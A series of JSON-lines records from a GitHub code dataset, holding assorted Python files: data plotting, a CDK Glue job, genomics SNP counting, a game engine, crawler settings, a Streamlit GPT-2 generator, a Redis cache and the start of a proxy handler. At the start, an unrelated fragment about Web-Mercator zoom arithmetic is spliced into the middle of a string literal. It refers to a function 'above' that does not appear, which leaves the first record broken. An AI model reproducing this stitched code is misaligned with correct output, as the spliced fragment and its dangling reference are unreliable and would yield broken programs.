1])\nplt.legend(loc = 'upper 
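prepare_map_image above derives a Web-Mercator zoom level from the feature extent: it asks which zoom makes 256 px tiles span the extent within the configured capture size. The arithmetic in isolation (hint_size stands in for app_settings['MAP_CAPTURE_SIZE']; 800 px is an assumed value):

import math

def zoom_for_length(length_m, hint_size=800):
    RADIUS = 6378137                 # WGS84 equatorial radius, metres
    CIRCUM = 2 * math.pi * RADIUS    # Web-Mercator world circumference
    length_per_tile = 256 * length_m / hint_size
    return round(math.log(CIRCUM / length_per_tile, 2))

print(zoom_for_length(10000))  # a ~10 km extent at an 800 px hint -> zoom 14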
right')\nfig.savefig('report/noise_5.png')\n\nav = sum(noise_list)/len(noise_list)\nprint('Среднее значение: %s' % av)\ndisp = 0\nfor i in noise_list:\n disp = disp + pow((i - av), 2)\ndisp = disp / (len(noise_list) - 1)\nprint('Дисперсия: %s' % disp)\n","repo_name":"denisko890/digit_data_processing","sub_path":"lab2/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1022,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3492431323","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\n\n\ndef plot_price_variation_per_sector(df):\n # Extract the columns we need in this step from the dataframe\n df_ = df.loc[:, ['Stock', 'Sector', 'PRICE VAR [%]']]\n\n # Get list of sectors\n sector_list = df_['Sector'].unique()\n\n # Plot the percent price variation for each sector\n for sector in sector_list:\n temp = df_[df_['Sector'] == sector]\n\n plt.figure(figsize=(30, 5))\n plt.plot(temp['Stock'], temp['PRICE VAR [%]'])\n plt.title(sector.upper(), fontsize=20)\n plt.show()\n\n\ndef plot_correlation_matrix(df, title):\n corrMatrix = df.corr()\n fig, ax = plt.subplots(figsize=(20, 15))\n sns.heatmap(corrMatrix, annot=False, cmap='YlGnBu', vmin=-1, vmax=1, center=0, ax=ax)\n# plt.title(title, fontsize=20)\n fig.savefig(f\"{title}.png\", bbox_inches=\"tight\")\n plt.show()\n","repo_name":"Simbonobo/economics","sub_path":"eda.py","file_name":"eda.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"73665817798","text":"from aws_cdk import core\nfrom aws_cdk import aws_glue as glue\n\nclass RdsClusterStack(core.Stack):\n\n def __init__(self, scope: core.Construct, id: str, **kwargs) -> None:\n \n glue.CfnJob(\n scope=self,\n id=modname,\n command={\n 'name': 'glueetl',\n 'python_version': '3',\n 'script_location': 's3://shaw-stc-edl-etl-config-playpen/test/glue/spark/__main__.py'\n },\n role=etl_role.role_arn,\n default_arguments={\n '--enable-glue-datacatalog': ''\n },\n allocated_capacity=10,\n description='Test Spark Glue ETL',\n glue_version='1.0',\n max_capacity=10,\n max_retries=0,\n number_of_workers=1,\n timeout=2880,\n worker_type='Standard'\n )\n\napp = core.App()\nGlueJobStack(app, \"glue-job\")\n\napp.synth()\n","repo_name":"dkovvuri/cdk-examples","sub_path":"glue_job/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"38829852949","text":"# Нап��сать функцию, которая возвращает\n# длину самой длинной подстроки, которая состоит только из гласных (aiueoAIUEO).\n\nimport re\ndef max_len(string_):\n list_from_string = string_.split()\n list_2 = []\n for el in list_from_string:\n el_from_vowels = re.sub(r'[^aeiouAEIOU]', '', el)\n list_2.append(el_from_vowels)\n list_3 = []\n for a in list_from_string:\n for b in list_2:\n if a == b:\n list_3.append(b)\n\n print(max(list_3, key=len))\nmax_len('AV aa is eeei largest Uuuuiiioo Analytics community of')","repo_name":"lelya12321/-roadmap","sub_path":"регулярные выражения 1 задача.py","file_name":"регулярные выражения 1 задача.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"8678170355","text":"#!python\nimport re\nimport subprocess\nimport sys\nfrom argparse import ArgumentParser\nimport sys\n#read a fasta file and return a dictionary, 
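The Russian comment heading the vowel snippet above translates as: write a function that returns the length of the longest substring consisting only of the vowels aiueoAIUEO. The implementation shown actually compares whole words rather than substrings; the stated task has a direct regex solution, collecting maximal vowel runs and taking the longest:

import re

def max_vowel_run(s):
    # findall with a quantified character class yields each maximal vowel run.
    return max((len(m) for m in re.findall(r"[aeiouAEIOU]+", s)), default=0)

assert max_vowel_run("AV aa is eeei largest Uuuuiiioo") == 9  # "Uuuuiiioo"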
the key is entry id and the value is the sequence in upcase\nfrom utils import readFastaFile\nfrom utils import str2bool\nimport re\n\nclass SNP:\n def __init__(self, chr, v4cordinate, maf, geno, depth, mpileup):\n self.chr = chr\n self.v4cordinate = v4cordinate\n self.maf = maf\n self.geno = geno\n self.depth = depth\n self.mpileup = mpileup\n def __str__(self):\n return (self.chr + \"\\t\" + str(self.v4cordinate) + \"\\t\" + str(self.maf) + \"\\t\" + str(self.geno) + \"\\t\" + str(self.depth) + \"\\t\" + str(self.mpileup))\n\n\nif __name__ == '__main__':\n parser = ArgumentParser(description='count number of based overlap between CNS bam output and the eQTL result,'\n 'please input the vcf file and the eqtl for one chromosome only')\n\n parser.add_argument(\"-g\", \"--genome\",\n dest=\"genome\",\n type=str,\n default=\"\",\n help=\"the masked reference genome file\")\n\n parser.add_argument(\"-b\", \"--bam\",\n dest=\"bam\",\n type=str,\n default=\"\",\n help=\"the output of and-CNS pipeline in bam format\")\n\n parser.add_argument(\"-c\", \"--chr\",\n dest=\"chr\",\n type=str,\n default=\"\",\n help=\"the chromosome to be analysised\")\n\n parser.add_argument(\"-s\", \"--mask\",\n dest=\"mask\",\n type=str2bool,\n default=True,\n help=\"only count the non-masking region SNP and genome length\")\n\n parser.add_argument(\"-m\", \"--miss\",\n dest=\"miss\",\n type=str,\n default=\"\",\n help=\"the missing statistics using V4 coordinate\")\n\n parser.add_argument(\"-v\", \"--vcf\",\n dest=\"vcf\",\n type=str,\n default=\"\",\n help=\"the B73 v4 variant file in vcf format\")\n\n parser.add_argument(\"-f\", \"--maf\",\n dest=\"maf\",\n type=str,\n default=\"\",\n help=\"the MAF statistics using V4 coordinate\")\n\n args = parser.parse_args()\n\n\n if args.genome == \"\":\n print(\"Error: please specify --genome\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.bam == \"\":\n print(\"Error: please specify --bam\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.miss == \"\":\n print(\"Error: please specify --miss\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.maf == \"\":\n print(\"Error: please specify --maf\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.vcf == \"\":\n print(\"Error: please specify --vcf\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n if args.chr == \"\":\n print(\"Error: please specify --chr\", file=sys.stderr)\n parser.print_help()\n sys.exit(1)\n\n reference_genome = readFastaFile(args.genome)\n print(\"reference genome reading done\", file=sys.stderr)\n\n chr = args.chr\n id_to_v4cordinate_dict = dict()\n with open(args.vcf) as f:\n for line in f:\n if line[0] is not '#':\n elements = line.split('\\t')\n if elements[0] == chr:\n id_to_v4cordinate_dict[elements[2]] = elements[1]\n\n\n sig_v4cordinate_dict = dict()\n totalDepth = 0\n totalMpileup = 0\n # print(\"SNP reading done\", file=sys.stderr)\n seq = reference_genome[chr]\n seq = re.sub(\"\\\\s\", \"\", seq)\n seq = re.sub(\"-\", \"\", seq)\n if args.mask:\n # read the VCF file begin\n with open(args.maf) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if chr == elements[0] and (reference_genome[chr][int(position)-1] is not 'n') and (elements[4][0] is not 'N'):\n s = SNP(elements[0], int(position), float(elements[4]), -1, 0, 0)\n sig_v4cordinate_dict[position] = s\n # print(\"vcf file reading done\", file=sys.stderr)\n with 
open(args.miss) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if chr == elements[0] and (reference_genome[chr][int(position)-1] is not 'n') and (position in sig_v4cordinate_dict) and (elements[4][0] is not 'N'):\n sig_v4cordinate_dict[position].geno = float(elements[4])\n\n for line2 in subprocess.run(['samtools', 'depth', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[2]) > 0 and (reference_genome[chr][int(elements2[1])-1] is not 'n'):\n totalDepth = totalDepth + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].depth = int(elements2[2])\n # print()\n # print(line2)\n # print(sig_v4cordinate_dict[position])\n # print(\"samtools depth done\", file=sys.stderr)\n\n for line2 in subprocess.run(['samtools', 'mpileup', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[3]) > 0 and (reference_genome[chr][int(elements2[1])-1] is not 'n'):\n totalMpileup = totalMpileup + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].mpileup = int(elements2[3])\n seq = re.sub(\"n\", \"\", seq)\n else:\n with open(args.maf) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if (chr == elements[0] and (elements[4][0] is not 'N')):\n s = SNP(elements[0], int(position), float(elements[4]), -1, 0, 0)\n sig_v4cordinate_dict[position] = s\n # print(\"vcf file reading done\", file=sys.stderr)\n with open(args.miss) as f:\n for line in f:\n line = line.lstrip()\n if line[0] is not 'C':\n elements = line.split()\n position = id_to_v4cordinate_dict[elements[1]]\n if (chr == elements[0] and (elements[4][0] is not 'N') and (position in sig_v4cordinate_dict) ):\n sig_v4cordinate_dict[position].geno = float(elements[4])\n\n for line2 in subprocess.run(['samtools', 'depth', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[2]) > 0:\n totalDepth = totalDepth + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].depth = int(elements2[2])\n # print(\"samtools depth done\", file=sys.stderr)\n\n for line2 in subprocess.run(['samtools', 'mpileup', '-r', chr, args.bam], stdout=subprocess.PIPE, stderr=subprocess.PIPE, encoding='utf8').stdout.split(\"\\n\"):\n if len(line2) > 0:\n elements2 = line2.split()\n position = elements2[1]\n if int(elements2[3]) > 0:\n totalMpileup = totalMpileup + 1\n if position in sig_v4cordinate_dict:\n sig_v4cordinate_dict[position].mpileup = int(elements2[3])\n\n for position in sig_v4cordinate_dict:\n if sig_v4cordinate_dict[position].mpileup > 0:\n print(\"mpileup\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n else:\n print(\"non-mpileup\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n if sig_v4cordinate_dict[position].depth > 0:\n print(\"depth\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n else:\n 
print(\"non-depth\\t\" + str(sig_v4cordinate_dict[position].geno) + \"\\t\" + str(sig_v4cordinate_dict[position].maf))\n # print(sig_v4cordinate_dict[position])\n","repo_name":"baoxingsong/CNSpublication","sub_path":"CNS_analysis/cnsWithSNPsMaf.py","file_name":"cnsWithSNPsMaf.py","file_ext":"py","file_size_in_byte":9230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"72609777157","text":"import json\nimport random\n\nfrom ahriman import constants\nfrom ahriman import logger\nfrom ahriman.constants import GameAction\nfrom ahriman.game import Board\nfrom ahriman.game.cardholder import CardHolder\nfrom .logic import Logic\n\n\nclass Game:\n OBJECTS_DICT = {}\n RULES_DICT = {}\n\n @staticmethod\n def parse_logic():\n if len(Game.OBJECTS_DICT) == 0:\n Game.parse_objects()\n Game.parse_rules()\n\n @staticmethod\n def parse_objects():\n try:\n with open(constants.LOGIC_OBJECTS, 'r') as file:\n Game.OBJECTS_DICT = json.load(file)\n\n try:\n for name_tile, tile in Game.OBJECTS_DICT['tiles'].items():\n if len(tile['resources']) > 1:\n logger.error('multiple resource on one tile', name_tile)\n raise NotImplementedError('multiple resource on one tile')\n\n Game.convert_textures(tile)\n\n if len(tile['resources']) > 0:\n tile['textures']['symbol'] = '_'.join(('symbols', list(tile['resources'])[0]))\n\n for name_node, node in Game.OBJECTS_DICT['nodes'].items():\n Game.convert_textures(node)\n\n for name_card, card in Game.OBJECTS_DICT['cards'].items():\n card['texture'] = '_'.join(('cards', name_card))\n\n except KeyError as e:\n logger.error('invalid objects.json - ', str(e))\n raise KeyError('invalid objects.json')\n\n logger.confirm('objects successfully loaded !')\n\n except FileNotFoundError as e:\n logger.error(e, title=\"in tiles parsing\")\n raise e\n\n @staticmethod\n def convert_textures(board_object_dict):\n for tex_group, tex_name in board_object_dict['textures'].items():\n board_object_dict['textures'][tex_group] = '_'.join((constants.TEXTURE_CLASS[tex_group], tex_name))\n\n @staticmethod\n def parse_rules():\n try:\n with open(constants.LOGIC_RULES, 'r') as file:\n Game.RULES_DICT = json.load(file)\n\n logger.confirm('rules successfully loaded !')\n\n except FileNotFoundError as e:\n logger.error(e, title=\"in rules parsing\")\n raise e\n\n def __init__(self, window, player_num, total_players=2):\n self.logic = Logic(total_players)\n\n self.player_num = player_num\n\n self.initialized = False\n self.send_game_action = window.gameClient.send_game_action\n\n self.graphic_board = Board(window, rows=Game.RULES_DICT['board']['rows'],\n cols=Game.RULES_DICT['board']['cols'])\n self.card_holder = CardHolder(window)\n # TODO remove this and correctly load the cards\n self.card_holder.draw_hand([Game.OBJECTS_DICT['cards']['flag']] * 3)\n\n self.highlighted_tile = None\n self.selected_tile = None\n self.last_click = 0\n self.highlighted_node = None\n self.selected_node = None\n self.highlighted_card = None\n self.selected_card = None\n\n self.selected_actions = [None] * total_players\n\n @property\n def state_dict(self):\n end_turn = self.selected_actions[self.player_num] is not None and not self.logic.turn_validated[self.player_num]\n return {\n 'tiles': self.logic.owned_tiles,\n 'captures': self.logic.captures,\n 'points': self.logic.victory_points,\n 'end_turn_enabled': end_turn,\n }\n\n def validate_turn(self, player_num=None):\n if player_num is None:\n if self.selected_actions[self.player_num] is not None:\n 
self.logic.turn_validated[self.player_num] = True\n self.send_game_action(action=constants.GameAction.TURN_DONE)\n\n else:\n if self.logic.turn_validated[player_num]:\n logger.warning('a player validated his turn twice')\n self.logic.turn_validated[player_num] = True\n\n if all(self.logic.turn_validated):\n self.send_game_action(action=self.selected_actions[self.player_num][0],\n coord=self.selected_actions[self.player_num][1])\n\n def perform(self, player, action, coord):\n try:\n if not self.logic.can_perform(player, action, coord):\n return False\n except TypeError:\n return False\n\n self.selected_actions[player] = (action, coord)\n\n if not any([action is None for action in self.selected_actions]):\n to_update = self.logic.resolve(self.selected_actions)\n for coord in to_update:\n self.graphic_board[coord].change_owner(self.logic[coord].owner)\n # TODO animate the turn resolution\n\n self.selected_actions = [None] * self.logic.total_players\n self.select_node(None)\n\n return True\n\n def disconnect(self, player):\n self.logic.turn_validated[player] = False\n\n def add_node(self, coord, owner=-2):\n self.graphic_board.nodes[coord].set_object(\n Game.OBJECTS_DICT['nodes'][Game.RULES_DICT['board']['node_object']], -2)\n self.logic.add_node(coord, owner)\n\n def add_tile(self, tile_coord, tile_name, owner=-1):\n self.graphic_board.tiles[tile_coord].set_object(Game.OBJECTS_DICT['tiles'][tile_name], owner)\n self.logic.add_tile(tile_coord, tile_name, owner)\n\n def init_board(self):\n # TODO is this half splitting necessary? NO\n total_half = (len(self.graphic_board.tiles)) // 2\n total_weight = sum(Game.RULES_DICT['board']['init'].values())\n\n left_half = []\n for tile, weight in Game.RULES_DICT['board']['init'].items():\n stack = [tile] * int(round(total_half * weight / total_weight))\n left_half.extend(stack)\n\n if len(left_half) < total_half:\n left_half.extend(\n [list(Game.RULES_DICT['board']['init'])[0]] * (total_half - len(left_half)))\n elif len(left_half) > total_half:\n left_half.pop()\n\n right_half = list(left_half)\n random.shuffle(right_half)\n random.shuffle(left_half)\n\n def put_left(tile_coord):\n put_tile = left_half.pop()\n self.add_tile(tile_coord, put_tile)\n\n def put_right(tile_coord):\n put_tile = right_half.pop()\n self.add_tile(tile_coord, put_tile)\n\n for coord in self.graphic_board.tiles.keys():\n if coord[1] == 2 * coord[0] + 1 - self.graphic_board.cols:\n if coord[1] < self.graphic_board.rows - 1:\n put_right(coord)\n elif coord[1] > self.graphic_board.rows - 1:\n put_left(coord)\n else:\n self.add_tile(coord, Game.RULES_DICT['board']['fill'])\n elif coord[1] < 2 * coord[0] + 1 - self.graphic_board.cols:\n put_right(coord)\n elif coord[1] > 2 * coord[0] + 1 - self.graphic_board.cols or coord[1] > self.graphic_board.rows:\n put_left(coord)\n\n for coord in self.graphic_board.nodes.keys():\n self.graphic_board.nodes[coord].set_object(\n Game.OBJECTS_DICT['nodes'][Game.RULES_DICT['board']['node_object']], -2)\n self.add_node(coord)\n\n self.initialized = True\n\n def select_tile(self, tile):\n if self.selected_tile != tile:\n if self.selected_tile is not None:\n self.graphic_board[self.selected_tile].change_color(\n constants.TILE_BASE_COLOR)\n self.graphic_board[self.selected_tile].set_select_tex('none')\n\n if tile is not None:\n self.graphic_board[tile].change_color(constants.TILE_SELECT_COLOR)\n self.graphic_board[tile].set_select_tex('UI_select')\n\n self.selected_tile = tile\n\n def select_node(self, node):\n if self.selected_node != node:\n if 
self.selected_node is not None:\n self.graphic_board[self.selected_node].change_color(\n constants.TILE_BASE_COLOR)\n self.graphic_board[self.selected_node].set_select_tex('none')\n\n if node is not None:\n self.graphic_board[node].change_color(constants.TILE_SELECT_COLOR)\n self.graphic_board[node].set_select_tex('UI_select_node', self.player_num)\n\n self.selected_node = node\n\n def highlight_node(self, node):\n if self.highlighted_node != node:\n if self.highlighted_node is not None and self.highlighted_node != self.selected_node:\n self.graphic_board[self.highlighted_node].change_color(\n constants.TILE_BASE_COLOR)\n self.graphic_board[self.highlighted_node].set_select_tex('none')\n\n if node is not None and node != self.selected_node:\n self.graphic_board[node].change_color(constants.TILE_SELECT_COLOR)\n self.graphic_board[node].set_select_tex('UI_highlight_node', self.player_num)\n\n self.highlighted_node = node\n\n def highlight_tile(self, tile):\n if self.highlighted_tile != tile:\n if self.highlighted_tile is not None and self.highlighted_tile != self.selected_tile:\n self.graphic_board[self.highlighted_tile].change_color(\n constants.TILE_BASE_COLOR)\n\n if tile is not None and tile != self.selected_tile:\n self.graphic_board[tile].change_color(constants.TILE_HIGHLIGHT_COLOR)\n\n self.highlighted_tile = tile\n\n def select_card(self, card):\n if self.selected_card != card:\n if self.selected_card is not None:\n if self.highlighted_card is not None and self.highlighted_card == self.selected_card:\n self.card_holder.select_card(self.selected_card, False, full=False)\n else:\n self.card_holder.select_card(self.selected_card, False, full=True)\n\n if card is not None:\n if self.highlighted_card is not None and self.highlighted_card == card:\n self.card_holder.select_card(card, True, full=False)\n else:\n self.card_holder.select_card(card, True, full=True)\n\n self.selected_card = card\n\n def highlight_card(self, card):\n if self.highlighted_card != card:\n if self.highlighted_card is not None and self.highlighted_card != self.selected_card:\n self.card_holder.select_card(self.highlighted_card, False)\n\n if card is not None and card != self.selected_card:\n self.card_holder.select_card(card, True)\n\n self.highlighted_card = card\n\n def on_mouse_click(self, x, y):\n if self.initialized:\n if not self.logic.turn_validated[self.player_num]:\n card = self.card_holder.mouse_to_card(x, y)\n self.select_card(card)\n if card is not None:\n self.select_node(None)\n else:\n node = self.graphic_board.mouse_to_node_coord(x, y)\n if node is not None and self.perform(self.player_num, GameAction.CONQUER, node):\n self.select_node(node)\n\n def on_mouse_move(self, x, y):\n if self.initialized:\n\n card = self.card_holder.mouse_to_card(x, y)\n self.highlight_card(card)\n\n if card is None:\n node = self.graphic_board.mouse_to_node_coord(x, y)\n self.highlight_node(node)\n\n else:\n self.highlight_node(None)\n\n def on_mouse_scroll(self, mouse_x, mouse_y, scroll_x, scroll_y):\n if self.initialized:\n self.graphic_board.on_mouse_scroll(mouse_x, mouse_y, scroll_x, scroll_y)\n\n def on_mouse_drag(self, x, y, dx, dy, buttons, modifiers):\n if self.initialized:\n self.graphic_board.on_mouse_drag(x, y, dx, dy, buttons, modifiers)\n\n def on_resize(self, width, height):\n self.graphic_board.on_resize(width, height)\n\n def update(self, dt, move):\n self.graphic_board.update(dt, move)\n self.card_holder.update()\n\n def draw(self):\n self.graphic_board.draw()\n self.card_holder.draw()\n\n def 
load_state(self, state):\n self.logic = state\n for coord, tile in state.logic_tiles_board.items():\n self.graphic_board.tiles[coord].set_object(Game.OBJECTS_DICT['tiles'][tile.type],\n owner=tile.owner)\n for coord, node in state.logic_nodes_board.items():\n self.graphic_board.nodes[coord].set_object(\n Game.OBJECTS_DICT['nodes'][Game.RULES_DICT['board']['node_object']], node.owner)\n\n self.initialized = True\n\n def delete(self):\n self.graphic_board.delete()\n","repo_name":"FrailHand/Ahriman","sub_path":"client/ahriman/game/game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":12952,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"31887455377","text":"# coding: utf-8\n\n## default session id\nBOT = \"spider\"\n\n## HEADERS\nUSER_AGENT = \"Spider Bot\"\nDEFAULT_HEADERS = {\n \"user-agent\": USER_AGENT,\n \"accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3\",\n \"accept-encoding\": \"gzip, deflate\",\n \"accept-language\": \"en\",\n}\n\n## robots.txt\nROBOTSTXT_OBEY = True\n\n## COOKIES\nCOOKIES_DEBUG = False\nCOOKIES_STORE_ENABLED = True\nCOOKIES_STORE_DB = None\nCOOKIES_CLEAR = False\n\n## TIMEOUT and DELAY\nDOWNLOAD_TIMEOUT = 30\nDOWNLOAD_DELAY = 0\n\n## DOWNLOADER_MIDDLEWARES\nDOWNLOADER_MIDDLEWARES = []\n\n## ITEM_PIPELINES\nITEM_PIPELINES = []\n\n## REDIRECT and RETRY\nREDIRECT_ENABLED = True\nRETRY_TIMES = 3\nRETRY_HTTP_CODES = [500, 502, 503, 504, 522, 524, 408, 429]\n\n## LOG\nLOG_ENABLED = False\nLOG_ENCODING = \"utf-8\"\nLOG_FILE = None\nLOG_FORMAT = \"%(asctime)s %(levelname)s [%(name)s] %(message)s\"\n\n## thread\nCONCURRENT_REQUESTS = 16\n\n# DFO or BFO\nDEPTH_PRIORITY = 1","repo_name":"glamas/pycurl_session","sub_path":"pycurl_session/spider/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":974,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"62"} +{"seq_id":"14414861493","text":"from sys import argv\r\nimport os\r\n\r\nRESULT_FILE = 'ft_fun.c'\r\n\r\n\r\ndef read_pcap_file(file_name):\r\n with open(file_name, \"r\") as file:\r\n file_content = file.readlines()\r\n if \"//file\" in file_content[-1]:\r\n return int(file_content[-1].replace(\"//file\", \"\")), file_content\r\n else:\r\n raise Exception(f\"File: '{file_name}' is invalid.\")\r\n\r\n\r\ndef create_file_from_dir(dir_name):\r\n files = {}\r\n last_index = 0\r\n \r\n for file_name in os.listdir(dir_name):\r\n file_name = os.path.join(dir_name, file_name)\r\n if os.path.isfile(file_name):\r\n file_index, file_content = read_pcap_file(file_name)\r\n files[file_index] = file_content\r\n if last_index < file_index:\r\n last_index = file_index\r\n with open(RESULT_FILE, \"w\") as file:\r\n for i in range(1, last_index + 1):\r\n file.writelines(files[i])\r\n file.write(\"\\n\")\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n if len(argv) == 2:\r\n print(f\"Reading files from {argv[1]}\")\r\n create_file_from_dir(argv[1])\r\n except Exception as e:\r\n print(e)\r\n","repo_name":"dburtnja/boot2root","sub_path":"unfan_fun.py","file_name":"unfan_fun.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"43695678365","text":"all_items = \"\"\"monolith\nastronaut ice cream\nhologram\nornament\nasterisk\nfixed point\ndark matter\nantenna\n\"\"\".splitlines()\n\nimport functools\nimport itertools\n\n# 
clean slate\nfor item in all_items:\n print(f'drop {item}')\n\nfor comb_length in range(1, len(all_items)+1):\n\n for comb_items in itertools.combinations(all_items, comb_length):\n print()\n\n for item in comb_items:\n print(f'take {item}')\n print(\"east\") \n # game will quit when correct items picked up\n for item in comb_items:\n print(f'drop {item}')\n print()","repo_name":"sonneveld/advent-of-code","sub_path":"advent19/25/weight_brute_force.py","file_name":"weight_brute_force.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} +{"seq_id":"8982915002","text":"#\n# Streamlit app for text generation for NLP Project\n# Andrew Zhou\n#\n# Some code taken from demos from https://github.com/streamlit/\n#\n\nimport streamlit as st\nimport torch\nst.beta_set_page_config(layout=\"wide\")\n\nfrom transformers import GPT2Tokenizer, GPT2LMHeadModel\nfrom streamlit.report_thread import get_report_ctx\n\n# tokenizer and model must be in the directory\n@st.cache(allow_output_mutation=True)\ndef init():\n tokenizer = GPT2Tokenizer.from_pretrained(\"tokenizer\")\n model = GPT2LMHeadModel.from_pretrained(\"model\")\n return {\"tokenizer\": tokenizer, \"model\": model}\n\nctx = get_report_ctx()\ncache = init()\nst.markdown(\"
Yip Yip!: A Fanfiction Generator\", unsafe_allow_html=True)\n\nst.markdown(\"Input a starting seed and I'll generate text in the style of an Avatar: The Last Airbender fanfiction!\", unsafe_allow_html=True)\nst.markdown(\"\", unsafe_allow_html=True)\n\ncss = \"\"\"\n    \n    \"\"\"\n\nst.markdown(css, unsafe_allow_html=True)\n\n_, col_1, _, col_3, _ = st.beta_columns((0.1, 1, 0.1, 1, 0.1))\n\n\nimport streamlit.components.v1 as components\n\n\nwith col_1:\n    starter_header = st.markdown(\"Give me some starter text!\", unsafe_allow_html=True)\n    starter_text = st.empty()\n    generate_fic = st.button(\"Generate a fic!\")\n    length = st.number_input(\"How many tokens should the fic be?\", 200)\n\n\nwith col_3:\n    recommend_header = st.markdown(\"Your fic:\", unsafe_allow_html=True)\n    fic_container = st.beta_container()\n\nwith col_1:\n    txt = starter_text.text_area(\"\", \"Zuko\", height=375)\n\ntemperature = 0.8\ntop_p = 0.94\ntop_k = 60\nrep_pen = 1.2\nnum_return = 1\n\nif generate_fic:\n    output_length = length\n    md_recs = \"\"\n    input_ids = cache[\"tokenizer\"].encode(str(txt), return_tensors=\"pt\")#.cuda()\n\n    output = cache[\"model\"].generate(\n        input_ids=input_ids,\n        max_length=output_length,\n        temperature=temperature,\n        top_k=top_k,\n        top_p=top_p,\n        repetition_penalty=rep_pen,\n        do_sample=True,\n        num_return_sequences=num_return\n    )[0]\n    md_recs += cache[\"tokenizer\"].decode(output, skip_special_tokens=True)\n\n    md_recs += \"
\"\n fic_container.markdown(md_recs, unsafe_allow_html=True)\n","repo_name":"zhouandrewc/fanfic-nlp","sub_path":"app/fanfic_generator.py","file_name":"fanfic_generator.py","file_ext":"py","file_size_in_byte":3315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"73715182598","text":"import json\r\nimport datetime\r\nfrom decouple import config\r\nfrom redis import Redis\r\n\r\n\r\nclass RedisCache:\r\n def __init__(self):\r\n \"\"\"Iniciar a Classe Cache Redis\"\"\"\r\n self.redis = Redis(\r\n host= config('REDIS_HOST'),\r\n port= config('REDIS_PORT'),\r\n username= config('REDIS_USERNAME'),\r\n password= config('REDIS_PASSWORD'),\r\n db=0)\r\n\r\n def add_cache(self, product, list_products):\r\n \"\"\" Função adicionar dados de registro no Redis e definir o tempo de expiração para chave \"\"\"\r\n days = datetime.timedelta(minutes=10)\r\n seconds = days.total_seconds()\r\n try:\r\n json_data = json.dumps(list_products)\r\n bytes_data = json_data.encode()\r\n\r\n self.redis.set(product, bytes_data)\r\n self.redis.expire(product, time=int(seconds))\r\n print('Registro adicionado a cache redis')\r\n \r\n except Exception as e:\r\n raise Exception('Obteve os seguinte erro:', e)\r\n\r\n def get_cache(self, product):\r\n \"\"\" Função obter dados de registro no Redis.\"\"\"\r\n prod = self.redis.get(product)\r\n json_data = json.loads(prod)\r\n return json_data\r\n\r\n def registry_exists(self, product):\r\n \"\"\" Função para verificar se existem dados de registro no Redis.\"\"\"\r\n prod_exist = self.redis.exists(product)\r\n return prod_exist\r\n\r\n def delete_registry(self, product):\r\n \"\"\" Função para excluir dados do registro no Redis.\"\"\"\r\n self.redis.delete(product)\r\n print('Registro em cache deletado')\r\n ","repo_name":"By-Lucas/Project-Devnology-Api-WebScraping","sub_path":"apps/controllers/rediscache.py","file_name":"rediscache.py","file_ext":"py","file_size_in_byte":1628,"program_lang":"python","lang":"pt","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"} +{"seq_id":"21996650794","text":"import asyncio\nimport logging\nimport socket\nimport struct\n\nfrom shadowsocks import protocol_flag as flag\nfrom shadowsocks.cipherman import CipherMan\nfrom shadowsocks.utils import parse_header\n\nlogger = logging.getLogger(__name__)\n\n\nclass LocalHandler:\n \"\"\"\n 